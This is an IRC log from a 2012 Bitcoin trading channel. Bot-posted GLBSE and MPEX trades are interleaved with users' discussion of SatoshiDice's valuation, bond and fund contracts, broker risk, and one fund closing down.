[OBSI.HRPT] 1 @ 0.00549093 BTC [+] Oct 02 19:44:34 OneEyed actually shitty Oct 02 19:44:35 [GLBSE] [OBSI.HRPT] 1 @ 0.00549094 BTC [+] Oct 02 19:44:36 [GLBSE] [OBSI.HRPT] 1 @ 0.00577557 BTC [+] Oct 02 19:44:37 [GLBSE] [OBSI.HRPT] 2 @ 0.00617672 = 0.0124 BTC [+] Oct 02 19:44:39 wasn't statistical expectation 4k ? Oct 02 19:44:41 [GLBSE] [BIT.INC] 1 @ 0.1 BTC [+] Oct 02 19:45:03 mircea_popescu: that may be relatively shitty according to some criteria, but for something that requires no maintenance, that's great Oct 02 19:45:13 Compared to the hosting/tech expenses: 50 BTC Oct 02 19:45:32 :p Oct 02 19:45:32 mircea_popescu: how do you make out of MPEX? :) Oct 02 19:45:38 [GLBSE] [BIT.INC] 1 @ 0.05000001 BTC [-] Oct 02 19:45:39 was 4.5k last month Oct 02 19:45:45 but admittedly was a very good one Oct 02 19:46:03 Only from commissions on sales and PGP registrations? Oct 02 19:46:23 (I mean, only directly from MPEX) Oct 02 19:46:24 that's mpex. mpoe is my old options page Oct 02 19:46:26 [GLBSE] [BBBB] 8 @ 0.00016 = 0.0013 BTC [+] Oct 02 19:46:29 o mpex made like 1k Oct 02 19:46:34 or just under that Oct 02 19:46:51 :) Oct 02 19:47:18 OneEyed a little over 500 Oct 02 19:47:37 [GLBSE] [NASTY] 1 @ 0.484 BTC [+] Oct 02 19:47:39 [GLBSE] [NASTY] 1 @ 0.4848 BTC [+] Oct 02 19:48:24 mircea_popescu: does it require a lot of maintenance or does it run mostly by itself? (I would guess the second) Oct 02 19:48:50 if mircea_popescu was really making money off porn, he would list it on glbse, so i know he's lying Oct 02 19:49:01 well all payments are approved manually for instance. Oct 02 19:49:06 pigeons ahahah Oct 02 19:49:31 Prudent, but a real burden, especially if you need to go away for a while… Oct 02 19:49:34 [GLBSE] [PIMP] 22 @ 0.08999999 = 1.98 BTC [+] Oct 02 19:49:57 EskimoBob: you mean because of uncovered hedge issues? Oct 02 19:50:03 ^hedge^lever Oct 02 19:50:22 (sorry, not familiar with the words here) Oct 02 19:50:32 btw keeps moving up Oct 02 19:51:01 OneEyed hey, i started the thing knowing this so i'm not complaining. Oct 02 19:51:13 i mean btc keeps moving up Oct 02 19:51:15 go btc Oct 02 19:51:17 what hedge issues we talkin about ? Oct 02 19:51:18 !ticker Oct 02 19:51:18 Provide ticker. Oct 02 19:53:37 mircea_popescu: I don't know, it was a question on my side :) Oct 02 19:54:12 [GLBSE] [BITBOND] 1 @ 0.26 BTC [-] Oct 02 19:55:54 lol nefario was here Oct 02 19:58:04 mircea_popescu: how would you handle a situation where Patrick would delay the payback of the principal obtained from MPCD? Oct 02 19:58:22 sell the claim most likely. Oct 02 19:59:14 Best bid: 12.691, Best ask: 12.69898, Bid-ask spread: 0.00798, Last trade: 12.699, 24 hour volume: 41446, 24 hour low: 12.321, 24 hour high: 12.79 Oct 02 19:59:18 What would be the value of the asset? The principal or the money obtained from selling the debt? Oct 02 19:59:21 i would regard him as being in default for it tho, and neg rate Oct 02 19:59:33 fact of the matter is, i told him at deposit time when the money needs to come out. Oct 02 19:59:40 that he cut rates in the meanwhile i'll pass Oct 02 19:59:53 OneEyed money obtained. Oct 02 20:00:53 You should use MPEX to auction the claim first :) Oct 02 20:01:03 OneEyed i was thinking of using bitcoin-auctiobn Oct 02 20:01:07 mpex isn't an auction platform Oct 02 20:01:51 He can be, if you have 1 share to sell. Just don't put a bid before a certain date, and let people place asks, that would be an auction Oct 02 20:02:12 (or the reverse) Oct 02 20:02:27 meh. Oct 02 20:02:30 You can even put the ask at the original price Oct 02 20:02:42 Maybe someone is willing to buy the debt in full, god knows why Oct 02 20:02:53 chang Oct 02 20:02:55 you there? Oct 02 20:03:16 Chaang-Noi; you want to buy some ltc? Oct 02 20:03:32 hmm Oct 02 20:03:37 how many? Oct 02 20:03:52 3647 Oct 02 20:03:58 [MPEX] [S.DICE] 32382 @ 0.0034 = 110.0988 BTC [+] Oct 02 20:04:00 what price? Oct 02 20:04:18 0.00409 Oct 02 20:04:24 Someone make me a deal, got BTC burning my pockets. Oct 02 20:04:25 [GLBSE] [BDK.BND] 11 @ 0.0495 = 0.5445 BTC [+] Oct 02 20:04:42 that's the highest ask on btc-e Oct 02 20:04:47 i just dont feel like logging in there, etc Oct 02 20:04:50 BTC-Mining give them to me Oct 02 20:05:01 okay Oct 02 20:05:03 i'll take care of them for you Oct 02 20:05:10 gigavps: will you eat a can of dog food on webcam for btc? Oct 02 20:05:31 ive always wanted to see that Oct 02 20:05:34 rg no, i have enough for the moment Oct 02 20:05:39 since the first day i found out about bitcoin-oc Oct 02 20:05:41 otc* Oct 02 20:05:42 Oh, that's a deal Gigavps? Perhaps you could tell me the many benefits of such a deal? Oct 02 20:05:50 rg 14.91623 btc right? Oct 02 20:05:52 BTC-Mining see that dice ticker ? that's yourt dal Oct 02 20:05:54 deal* Oct 02 20:05:58 14.9 is fine Oct 02 20:05:58 BTC-Mining depends on how much you have Oct 02 20:06:04 dividends imminent i think Oct 02 20:06:07 ok address? Oct 02 20:06:16 Ahah, dividends, you say Oct 02 20:06:22 1B8pxbrxdGfUa2nxQHbhqyKYtEHgLGciwe Oct 02 20:06:31 what's your addy Oct 02 20:06:47 [GLBSE] [DMC] 1 @ 0.07 BTC [-] Oct 02 20:06:55 LRfWhBeor9hUPd1bkiUavjrKZeYLArnrmu Oct 02 20:06:57 thanks Oct 02 20:07:10 b984e2c4916bf484788b4a3ab578b0ba9a8a712ac955941674342260c52104b8 Oct 02 20:07:39 362d47bb3eac8e2a650c77713c39dd72a1bec56d54d085d35b0b8ed3dee3ed47 Oct 02 20:07:41 :) Oct 02 20:07:49 someone should make a scamcoin altchain which uses adresses in the format 1ililililiiiilli Oct 02 20:07:59 1 followed just by i and l Oct 02 20:08:07 1iIlo0Oi1l Oct 02 20:08:09 obviously no checksum Oct 02 20:08:21 how about l and o so looololoooool ? Oct 02 20:08:25 o ya, O/0 workls too Oct 02 20:08:39 haha goat, could be the lolcoin Oct 02 20:13:09 i need to pay some bills Oct 02 20:13:12 deego isnt awake yet Oct 02 20:13:15 he always pays my bills Oct 02 20:13:16 arf Oct 02 20:13:41 [GLBSE] [JLP-BMD] 1 @ 0.08999999 BTC [+] Oct 02 20:14:38 night all.. think i tracked down the dragon... Oct 02 20:14:41 [GLBSE] [OBSI.HRPT] 1 @ 0.00400001 BTC [-] Oct 02 20:14:43 [GLBSE] [OBSI.HRPT] 5 @ 0.004 = 0.02 BTC [-] Oct 02 20:14:50 .004? oh lulz Oct 02 20:14:57 night Oct 02 20:17:08 [GLBSE] [COGNITIVE] 1 @ 0.57999999 BTC [+] Oct 02 20:17:09 [GLBSE] [COGNITIVE] 2 @ 0.58 = 1.16 BTC [+] Oct 02 20:17:38 Obviously that didn't cause you to mass buy OBSI.HRPT, so news are probably not good :) Oct 02 20:18:41 Wait, gigavps, were you serious? Oct 02 20:18:54 What would you do with the bitcoins? Oct 02 20:18:54 [GLBSE] [GSDPT] 20 @ 0.00389 = 0.0778 BTC [+] Oct 02 20:19:05 how often do you see me joking? Oct 02 20:19:23 awww wait, so patrick harnett defaulted too ? Oct 02 20:19:44 Not often... but on IRC most are more casual than on the forum. Oct 02 20:20:16 Patrick Harnett defaulted eh? Oct 02 20:20:52 i dunno, did he ? Oct 02 20:21:04 i don't see an announcement, just random bs from usagi & retard gang. Oct 02 20:21:42 Oh Oct 02 20:22:03 I have to go harass Amazingrando Oct 02 20:22:10 I'll be back Oct 02 20:23:59 [13:18] how often do you see me joking? Oct 02 20:24:02 you used to be fun Oct 02 20:24:05 before the rig got too big Oct 02 20:25:39 Everyone is fun until they start doing business. Oct 02 20:25:48 [GLBSE] [OBSI.HRPT] 75 @ 0.004 = 0.3 BTC [-] Oct 02 20:26:33 Be careful there usagi... with statements like this people will call you a clown. I mean, more than before. Oct 02 20:26:35 im still fun Oct 02 20:26:59 OBSI, OBSI, why don't you pay dividends! Oct 02 20:27:25 Oh wait... 0% - 1% per day eh. I guess he can pay 0%. Oct 02 20:27:36 Well if you can, why not?? Oct 02 20:27:39 there need to be some security pundits Oct 02 20:27:42 [GLBSE] [HYDRO.BONDS] 1 @ 1.33 BTC [-] Oct 02 20:27:48 contracts get more and more complex, people don't like to read Oct 02 20:27:55 someone needs to make a stock picks column Oct 02 20:28:03 My contracts are short and clear. Oct 02 20:28:15 0-1% is short and clear too Oct 02 20:28:29 Oh yeah, we have to give that to Obsi Oct 02 20:28:40 BTC-Mining: + "In the event of failure of the entity receiving pass-through investment, these bonds will not be repurchased." Oct 02 20:28:49 Chaang-Noi "I now have more BTC than I once did. What this is for is unclear." wait. what ?! Oct 02 20:28:57 [GLBSE] [BMF] 1 @ 0.40300001 BTC [-] Oct 02 20:29:14 "Whatever the entity is. You cannot check that didn't just steal your BTC. You lose." <-- should have been added too Oct 02 20:29:22 and ofcourse the entity is secret, so the claim can't be verified. Oct 02 20:29:33 That's convenient Oct 02 20:29:40 OneEyed people need to learn somehow that calling yourself "investor" doesn't make you one Oct 02 20:29:50 :) Oct 02 20:30:03 [GLBSE] [YABMC] 1 @ 0.07315001 BTC [-] Oct 02 20:30:06 [MPEX] [S.MPOE] 5520 @ 0.00036447 = 2.0119 BTC [+] Oct 02 20:30:08 [MPEX] [S.MPOE] 980 @ 0.00036451 = 0.3572 BTC [+] Oct 02 20:30:12 I guess many people feel safer with such "I may screw you clause, invest accordingly" because they feel warned and more empowered by their decision to "invest" Oct 02 20:30:16 Psst, BTC-BOND. The entity is myself and myself only. Oct 02 20:31:01 OneEyed possibly true. it does not scale tho. Oct 02 20:31:13 If you can't trade, loan the funds to me. There's my personal portfolio in front of loaned money to absorb losses. Oct 02 20:31:32 BTC-Mining weren't you complaining you're cash heavy a second ago ? Oct 02 20:32:11 The silence can be very noisy sometimes… Oct 02 20:32:13 I do a lot of trading. I almost always have a large part of funds in bids. Oct 02 20:32:22 Usually around 10 - 25% Oct 02 20:32:39 Doesn't mean I can't use more funds. Oct 02 20:33:10 Could have more bids up or simply keep it placed. Oct 02 20:35:05 BTC-Mining: why don't you directly post MIN/MAX/DURATION/INTERESTS? Oct 02 20:35:20 a good ideea that Oct 02 20:35:30 MIN/MAX/DURATION/INTERESTS? Oct 02 20:35:47 How much you want (MIN/MAX), for how long, and what you're ready to pay as interests for the loan Oct 02 20:36:04 [GLBSE] [ASIC.COOP] 1 @ 0.84 BTC [-] Oct 02 20:36:12 It's already all stated in BTC-BOND's contract. Oct 02 20:36:27 0.5% weekly, 200% collateral Oct 02 20:36:42 I can buy back your bonds upon request. Oct 02 20:37:21 [GLBSE] [ASIC.COOP] 1 @ 0.85 BTC [+] Oct 02 20:39:03 Aye, happy with them? Oct 02 20:39:24 Oh, "secured by GLBSE assets". I would chose FDBF if I wanted to trust GLBSE right now, better interest rates. Oct 02 20:40:02 Eh... Oct 02 20:40:36 I want to see first if BFL really delivers their ASIC beggining of November Oct 02 20:40:46 iirc he holds some mpex stuff too Oct 02 20:41:45 That will be funny to look at. Oct 02 20:42:00 OneEyed: better interest, but what protection does FDBF offer? Oct 02 20:42:16 BTC-Mining: none if GLBSE market crashes completely Oct 02 20:42:33 usagi: you could do that with Pirate at the beginning too Oct 02 20:42:55 usagi: like GBF. Very nice owner, very bad returns. Oct 02 20:43:12 usagi: you wouldn't have known by doing your liquidity test at the beginning Oct 02 20:43:44 usagi: "be transparent"? Oct 02 20:43:54 And yet you'll call out funds :) Oct 02 20:44:10 oh, FDBF is a fund. Oct 02 20:44:24 BTC-Mining: yep, the most transparent I've seen in a while Oct 02 20:44:51 BTC-BOND is not a fund Oct 02 20:45:22 Yes, I know. But the goal is to get money, right? Given that both are on GLBSE, they are practically indistinguishable by casual investors. Oct 02 20:46:15 Contractually, they are quite different in how they work however. Oct 02 20:47:21 usagi: aren't you in complete control of CPA/BMF/NYAN.* already? Oct 02 20:48:17 So you're saying that you'll multiply the investors BTC without ever risking their money? Oct 02 20:48:28 FDBF is PsychoticBoy and Paladon. Oct 02 20:48:36 BTC-Mining: yup Oct 02 20:48:42 Not friedcat's Oct 02 20:49:01 I thought friedcat reference was some kind of a joke I didn't get. Is there really someone nicknamed friedcat? Oct 02 20:49:33 Ok, never seen his name. Maybe because there's no asic yet. Oct 02 20:49:44 aye Oct 02 20:49:54 FriedCat also runs MOORE and MU Oct 02 20:50:38 Difference is, FDBF would have losses as soon as any holding they have a loss of value. BTC-BOND would not. Oct 02 20:51:08 So it might pay less but not without extra benefits. Oct 02 20:51:20 usagi: the problem with GLBSE and MPEX is that they act as a broker, in addition to being an exchange. As long as they don't keep an outside copy of the up-to-date investors portfolios, they disappearing make their investors broke Oct 02 20:51:45 isnt friedcat the face of asicminer ? Oct 02 20:51:48 usagi: if a protocol could be worked out with those brokers to ensure the information is not lost if they default or get hacked, then they would be usable without concerns Oct 02 20:52:04 @mircea_popescu yes Oct 02 20:52:16 OneEyed actually mpex has brokers. Oct 02 20:52:29 if you choose to go through one mpex is just the exchange Oct 02 20:52:36 if you chose to talk to it directly YOU are the broker. Oct 02 20:53:16 in soviet romania, BROKER IS YOU Oct 02 20:53:18 the 20 btc you pay pretty much gets you a floor spot. you can trade on your own acct or be a broker, w/e. Oct 02 20:53:23 mircea_popescu: more or less - you can still not prove ownership of a share to the asset owner, can you? Oct 02 20:53:38 sure you can Oct 02 20:53:40 mircea_popescu: (you can only prove that you bought a share, but that doesn't show that you haven't sold it) Oct 02 20:53:41 you have signed stats. Oct 02 20:53:47 it'd be nice to get subset statements Oct 02 20:53:55 copumpkin possibly. Oct 02 20:53:56 so you don't have to reveal your entire holdings to your clients, as a broker Oct 02 20:54:06 usagi: is it public? Oct 02 20:54:09 but you at least have a statement signed by MPEX saying that you own shit Oct 02 20:54:14 usagi: so it doesn't exist Oct 02 20:54:27 OneEyed, MPEx makes signed statements of account holdings. Oct 02 20:54:33 usagi: such a protocol should be submitted to as many pair of eyes as possible Oct 02 20:54:42 copumpkin the problem i see with substatements is this : a person could claim falsely they are covering many accounts with the statements for just the largest one Oct 02 20:54:45 BTC-Mining: yes, but it forces you to reveal your portfolio, as underlined by copumpkin Oct 02 20:54:46 OneEyed: so not to you, since you only have one? Oct 02 20:54:52 therefore, this would introduce security theatre, no gain of safety. Oct 02 20:54:56 mircea_popescu: yeah Oct 02 20:55:08 copumpkin: eheh :) Oct 02 20:55:16 and as such im not doing it. if client doesn't trust broker client doesn't use broker. Oct 02 20:55:33 OneEyed, think I'd care about revealing my portfolio? Oct 02 20:55:35 they can ask for order receipts from mpex, to prove broker isnt a bucket shop Oct 02 20:55:40 https://docs.google.com/spreadsheet/pub?key=0AvwwyRGyc1WgdGFKVlAtZVAzOGNqS1Brd05MUlFlT2c Oct 02 20:55:42 BTC-Mining: some people could Oct 02 20:55:57 It's been public since I started BTC-BOND Oct 02 20:55:59 yes it would be nice to be able to show someone one asset signed, without showing the whole portfolio Oct 02 20:56:08 [MPEX] [S.MPOE] 10100 @ 0.00036273 = 3.6636 BTC [-] Oct 02 20:56:10 [MPEX] [S.MPOE] 26500 @ 0.00036075 = 9.5599 BTC [-] Oct 02 20:56:21 guruvan see above tho Oct 02 20:56:27 back again Oct 02 20:56:39 BTC-Mining: pay out yet? Oct 02 20:57:14 Nope, got to go harass Amazingrando once again Oct 02 20:58:10 ah - yeah - that works fine, especially for a project I'm working on over here Oct 02 20:59:50 Eh, he keeps forgetting about poor BTC-MINING Oct 02 21:10:13 [GLBSE] [BAKEWELL] 2 @ 0.149 = 0.298 BTC [+] Oct 02 21:13:31 [GLBSE] [OBSI.HRPT] 1 @ 0.00719998 BTC [+] Oct 02 21:13:33 [GLBSE] [OBSI.HRPT] 39 @ 0.00719999 = 0.2808 BTC [+] Oct 02 21:18:59 [GLBSE] [BFLS.RIG] 5 @ 0.8 = 4 BTC [-] Oct 02 21:19:01 [GLBSE] [BFLS.RIG] 15 @ 0.799 = 11.985 BTC [-] Oct 02 21:21:06 [MPEX] [S.DICE] [PAID] 10000000 @ 0.00002065 = 206.53002099 BTC Oct 02 21:21:22 [MPEX] [F.GIGA.ETF] 300 @ 0.00044181 = 0.1325 BTC [+] Oct 02 21:22:12 !pl s.dice Oct 02 21:22:14 !pl [@] [] Oct 02 21:22:27 !pl s.dice .0032 Oct 02 21:22:27 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 02 21:22:41 GLBSE 404 Oct 02 21:22:52 [GLBSE] [DMC] 13 @ 0.075 = 0.975 BTC [+] Oct 02 21:22:53 ;;echo blah Oct 02 21:22:53 blah Oct 02 21:23:11 ;;echo GLBSE only Oct 02 21:23:11 GLBSE only Oct 02 21:23:12 indeed Oct 02 21:23:18 !pl s.dice .0032 Oct 02 21:23:19 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 02 21:23:22 hum Oct 02 21:23:31 GLBSE 404 Oct 02 21:23:31 !pl gsdpt .0032 Oct 02 21:23:32 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 02 21:23:36 GSDPT [1@0.0032BTC] paid: 7.468E-5 BTC. Last price: 0.00389 BTC. Capital gain: 0.00069 BTC. Total: 0.00076468 BTC. (23.9%) Oct 02 21:23:46 heh Oct 02 21:23:51 Dividends have probably not be paid there yet Oct 02 21:23:57 since it's a passthrough to MPEX… Oct 02 21:24:18 389 tho ? heh. Oct 02 21:24:20 OneEyed: 95% of divs only gets passed Oct 02 21:24:39 femtotube: yeah, but even those 95% have probably not been passed yet Oct 02 21:25:36 [GLBSE] [BLUECHIP] 3 @ 0.1 = 0.3 BTC [+] Oct 02 21:25:57 I wonder when those guys will back the bags and move on. He got his 10 years or so upfront Oct 02 21:26:01 hopefully next month is 2x over expectation and that expectation is 6k or something Oct 02 21:26:23 femtotube only 10% ever was put up for sale so far. Oct 02 21:27:07 BTC-Mining https://bitcointalk.org/index.php?topic=104489.msg1239647#msg1239647 mebbe help the guy out Oct 02 21:27:10 10% of a imaginary value, bloated way out of proportions Oct 02 21:27:37 all value is imaginary. Oct 02 21:28:42 what was the size of the issue in BTC? Oct 02 21:28:48 dice Oct 02 21:28:54 ~35k Oct 02 21:30:03 .calc 35x12= Oct 02 21:30:04 femtotube: Sorry, can't calculate that. Oct 02 21:30:04 Note that .calc is deprecated, consider using .c Oct 02 21:30:10 .calc 35 * 12 Oct 02 21:30:10 femtotube: Sorry, can't calculate that. Oct 02 21:30:11 Note that .calc is deprecated, consider using .c Oct 02 21:30:21 . 35 * 12 = Oct 02 21:30:26 GSDPT dividend will be paid in a couple of secs :) Oct 02 21:30:33 .c 35 * 12 = Oct 02 21:30:33 420 Oct 02 21:30:41 .py 2 * 32 + 5 * 34 + 3 * 37 / 10 Oct 02 21:30:43 245 Oct 02 21:30:45 pff Oct 02 21:30:49 .py (2 * 32 + 5 * 34 + 3 * 37) / 10 Oct 02 21:30:50 34 Oct 02 21:30:51 i did it faster in my head :) lol Oct 02 21:31:06 .c 35*12= Oct 02 21:31:07 420 Oct 02 21:31:11 OK, I see Oct 02 21:31:34 what do you see ? Oct 02 21:31:57 12.282453 BTC paid in dividend to GSDPT Oct 02 21:32:01 .py (2 * 32 + 5 * 34 + 3 * 37.0) / 10 Oct 02 21:32:02 34.5 Oct 02 21:32:06 LOL, this is funny, that something like that is valued at 4.2MM usd Oct 02 21:32:07 .py (2 * 32 + 5 * 34 + 3 * 37.0) / 10.0 Oct 02 21:32:08 34.5 Oct 02 21:32:21 i agree. i don't see how it's worth under 50-100mn. Oct 02 21:32:38 ??? Oct 02 21:32:43 yen? Oct 02 21:32:57 dollars/euros/whatever irrelevant fiat. Oct 02 21:33:03 whats the cost of 200 h of programming and testing? Oct 02 21:33:04 lol come on a simple site and game 4 fucking million, wtf, more like 50K Oct 02 21:33:12 apple's worth a trillion on the strength of owning a market that's bound to be irrelevant soon Oct 02 21:33:20 dice owns a market that's set to dominate soon. Oct 02 21:33:31 apple has NOTHING to do with 200 h of programming and testing Oct 02 21:33:34 PsychoticBoy i dunno why people keep thinking in terms of "o, a site" Oct 02 21:33:36 it's not a site. Oct 02 21:33:42 it's the source of the majority of bitcoin transactions. Oct 02 21:33:55 pain in the ass. Oct 02 21:33:56 no its a sinple game, programmed by a 4 year old Oct 02 21:33:59 who cares, it can be copied so easily Oct 02 21:34:03 hey, what can i tell you. Oct 02 21:34:06 Wish I thought of it Oct 02 21:34:08 the iphone is an ugly piece of plastic Oct 02 21:34:11 what sort of reasoning is this Oct 02 21:34:19 femtotube so copy it, cash in. Oct 02 21:34:32 PsychoticBoy: I'm sure you're upset not to have had the idea first. Oct 02 21:34:35 I for sure am :) Oct 02 21:34:42 hmmm... not a bad idea but i do not like gambling Oct 02 21:34:42 lol indeed Oct 02 21:34:53 OneEyed i got tons of ideas for you if you can code worth a shit and are willing to put the hours in Oct 02 21:35:11 thing is, nobody can code, nobody wants to work, everyone wants to sit tits up and go "oh, these things that people pay money for aren't worth money" Oct 02 21:35:13 da fuck. Oct 02 21:35:24 I can not code at all :( but I have some cool ideas too Oct 02 21:35:26 mircea_popescu: time is a factor. Concerning whether I can code or not, Ohloh can tell you Oct 02 21:35:35 OneEyed was just making a point. Oct 02 21:35:51 yes time is a factor. that's what makes founders make money. they put the time in. Oct 02 21:36:02 Yup, agreed Oct 02 21:37:15 https://www.ohloh.net/accounts/oneeyed <== shows I like to code Oct 02 21:38:04 If I can find someone to trust and write good code... Oct 02 21:38:26 impossible task probably Oct 02 21:38:32 ;;rate OneEyed 1 So he can code. Oct 02 21:38:33 Rating entry successful. Your rating of 1 for user OneEyed has been recorded. Oct 02 21:38:37 :-> Oct 02 21:39:04 OneEyed: looking at the URL, you have way too much free time :) Oct 02 21:39:20 cvs commits to cvs lol. that's something. Oct 02 21:39:43 Yeah, I was a student then, and we worked on CVS with the team from a small company named "Cyclic Software" Oct 02 21:39:57 CVS had just got client/server capabilities Oct 02 21:40:17 lol at least smpake is getting some traffic cause of bit4x Oct 02 21:40:46 OneEyed: no more work on kernel? Oct 02 21:40:50 why did you stop? Oct 02 21:41:36 [GLBSE] [ASICMINER] 5 @ 0.111099 = 0.5555 BTC [-] Oct 02 21:41:38 femtotube: I didn't "work" on the kernel, I wrote a driver for the watchdog of my dedicated server. I usually contribute when I need something, except for some projects that I find fun for some time, like c:geo Oct 02 21:42:13 OK, but still.. THE Kernel :) Oct 02 21:42:27 pff, just a kernel Oct 02 21:42:29 anyone could have done it. Oct 02 21:42:34 :) Oct 02 21:43:03 It helps that I teach how to write Linux device drivers in my embedded systems course. That was just a driver, indeed. Read the datasheet, write code, …, profit. Oct 02 21:43:16 again with the utf Oct 02 21:43:38 Yeah. I also have various dashes - – — Oct 02 21:43:51 (shit, my font renders them the same way in my terminal) Oct 02 21:43:54 :D Oct 02 21:43:55 I WIN Oct 02 21:44:08 In a text document they appear with different lengths :) Oct 02 21:44:15 (read "widths", sorry) Oct 02 21:44:16 dam, is there anything positive in the forums or only scamm accusations, rippoffs and everyday crap :( Oct 02 21:44:28 femtotube there's porn. Oct 02 21:45:02 femtotube: yeah, one think I have learned since I joined bitcointalk in July is that it's mostly shit Oct 02 21:45:06 sure, I have wife and kids right behind me at the moment. Oct 02 21:45:19 femtotube: he was not asking you to *produce* porn :) Oct 02 21:45:34 I did understand that Oct 02 21:45:51 (that was a joke, apparently a bad one) Oct 02 21:45:52 he probably wants to send me some of his porn links Oct 02 21:46:07 femtotube no, you were just being trolled. Oct 02 21:46:25 is that what you call trolling? Oct 02 21:47:05 [MPEX] [F.GIGA.ETF] 5300 @ 0.00044181 = 2.3416 BTC [+] Oct 02 21:47:07 [MPEX] [F.GIGA.ETF] 3290 @ 0.00044181 = 1.4536 BTC [+] Oct 02 21:47:09 Forum is 99% whining/scamming Oct 02 21:47:47 BTC-Mining kinda why i like irc. the vast majority of scammers doesn't have the technical ability to hang out yet. Oct 02 21:47:54 350000 @ 0.00012501? Oct 02 21:47:54 lol Oct 02 21:48:53 ppcoin looks like next funnymoney Oct 02 21:49:07 [GLBSE] [OBSI.HRPT] 31 @ 0.00719999 = 0.2232 BTC [+] Oct 02 21:50:07 funnymoney? Let's shorten it to funmoney. Oct 02 21:50:18 Or better yet, funney Oct 02 21:50:24 funnely Oct 02 21:51:27 [GLBSE] [OBSI.HRPT] 1 @ 0.00410001 BTC [-] Oct 02 21:51:44 just F* Oct 02 21:53:32 [GLBSE] [CPA] 2 @ 0.015 = 0.03 BTC [-] Oct 02 22:04:06 [GLBSE] [OBSI.HRPT] 29 @ 0.0041002 = 0.1189 BTC [+] Oct 02 22:04:36 [GLBSE] [OBSI.HRPT] 1 @ 0.0041002 BTC [+] Oct 02 22:04:37 [GLBSE] [OBSI.HRPT] 70 @ 0.0041001 = 0.287 BTC [-] Oct 02 22:05:51 femtotube just for my curiosity : does it occur to you s.dice would do much better by stealing the bets than by stealing the shareholders money ? Oct 02 22:05:57 it processes >200k btc a month anyway Oct 02 22:06:41 [GLBSE] [OBSI.HRPT] 29 @ 0.00410001 = 0.1189 BTC [-] Oct 02 22:06:43 [GLBSE] [OBSI.HRPT] 344 @ 0.004 = 1.376 BTC [-] Oct 02 22:09:27 [GLBSE] [GIGAMINING] 1 @ 0.58 BTC [-] Oct 02 22:10:20 [GLBSE] [MERGEDMINING] 1 @ 0.06199999 BTC [+] Oct 02 22:10:44 [GLBSE] [GSDPT] 300 @ 0.0034 = 1.02 BTC [-] Oct 02 22:10:45 [GLBSE] [GSDPT] 1 @ 0.0034 BTC [-] Oct 02 22:10:47 [GLBSE] [GSDPT] 19445 @ 0.0034 = 66.113 BTC [-] Oct 02 22:10:53 [GLBSE] [OBSI.HRPT] 2 @ 0.00495 = 0.0099 BTC [+] Oct 02 22:11:51 [GLBSE] [MERGEDMINING] 1 @ 0.03 BTC [-] Oct 02 22:12:23 !ticker s.dice Oct 02 22:12:24 [MPEX:S.DICE] 1day: 0.0034 / 0.0034 / 0.0034 (148238 shares, 504.01 BTC), 30day: 0.00325001 / 0.00337675 / 0.0034 (1922813 shares, 6,492.86 BTC) Oct 02 22:14:27 [MPEX] [S.MPOE] 1036 @ 0.00036075 = 0.3737 BTC [-] Oct 02 22:14:29 [MPEX] [S.MPOE] 17300 @ 0.00036074 = 6.2408 BTC [-] Oct 02 22:14:29 [MPEX] [S.MPOE] 33164 @ 0.00036063 = 11.9599 BTC [-] Oct 02 22:14:58 [MPEX] [S.DICE] 90 @ 0.00339999 = 0.306 BTC [-] Oct 02 22:15:14 [GLBSE] [GSDPT] 52 @ 0.003392 = 0.1764 BTC [-] Oct 02 22:15:16 [GLBSE] [GSDPT] 100 @ 0.00339103 = 0.3391 BTC [-] Oct 02 22:15:16 [GLBSE] [GSDPT] 700 @ 0.00339102 = 2.3737 BTC [-] Oct 02 22:15:17 [GLBSE] [GSDPT] 333 @ 0.00339101 = 1.1292 BTC [-] Oct 02 22:15:19 [GLBSE] [GSDPT] 1300 @ 0.003391 = 4.4083 BTC [-] Oct 02 22:15:20 [GLBSE] [GSDPT] 300 @ 0.00331 = 0.993 BTC [-] Oct 02 22:15:21 [GLBSE] [GSDPT] 12 @ 0.003301 = 0.0396 BTC [-] Oct 02 22:15:22 [GLBSE] [GSDPT] 58 @ 0.0033 = 0.1914 BTC [-] Oct 02 22:15:23 [GLBSE] [GSDPT] 1200 @ 0.0033 = 3.96 BTC [-] Oct 02 22:16:02 haha div paid ? Oct 02 22:18:19 looks like it Oct 02 22:23:11 [GLBSE] [GIGAMINING] 2 @ 0.59979999 = 1.1996 BTC [+] Oct 02 22:24:55 [GLBSE] [PUREMINING] 1 @ 0.1017 BTC [+] Oct 02 22:25:42 Dividend was indeed paid for GSDPT Oct 02 22:26:01 DeaDTerra: good luck on closing down GBF, I'm reading your post now Oct 02 22:26:23 DeaDTerra is closing his fund? Oct 02 22:26:32 Diablo-D3: https://bitcointalk.org/index.php?topic=74975.msg1239841;topicseen#msg1239841 Oct 02 22:26:45 I thought I was subscribed to the gbf thread Oct 02 22:26:57 [GLBSE] [DMC] 2 @ 0.075 = 0.15 BTC [+] Oct 02 22:28:02 "mircea_popescu | femtotube just for my curiosity..." I agree, that stealing and walking away not to long after successful IPO are similar acts but they are not really the same. Oct 02 22:28:15 [GLBSE] [DMC] 1 @ 0.06 BTC [-] Oct 02 22:28:17 [GLBSE] [DMC] 1 @ 0.02 BTC [-] Oct 02 22:28:21 but point being, they'd make more that way. Oct 02 22:28:32 DeaDTerra: so that 1 BTC I invested, what did it end up coming out as? Oct 02 22:28:34 site is trusted to the tune of 1/4 mn a month in bets. Oct 02 22:29:02 mircea_popescu: are they making 4.2 USD that way? Oct 02 22:29:14 No, they are not Oct 02 22:29:26 mircea_popescu: it depends, dodn't forget that if SatoshiDice were to stop paying people, word will spread very rapidly, since they use 0 confirmations payout is immediate Oct 02 22:29:34 Yes I am closing the fund unfortunatly Oct 02 22:29:36 Thy can not steal that large of a % Oct 02 22:30:11 The 1 BTC ended up at 0.9 ^^ Oct 02 22:30:13 OneEyed except recently they had a day's worth of payments on backlog recall ? Oct 02 22:30:17 DeaDTerra: I have had the occasion to tell you already, but I'll say it again a last time: I've not been lucky with my investment, but you were very nice as a manager, and for this I thank you Oct 02 22:30:26 It was as high as 1.38 then we had tons of defaults and bad investments. Oct 02 22:30:39 Currently buying in bulk: BIB.BVPS, S.BVPS, GIGAMINING, DMC, ASICMINER or anything else if it's a really good offer. Oct 02 22:30:40 DeaDTerra: know how you feel =/ Oct 02 22:30:46 best way is to run IPO, and than say ... of we can not run it any more. Some gambling blah is after us ... end of the story Oct 02 22:30:47 Thank you!, It was not a easy decision to make, I must say. Oct 02 22:31:03 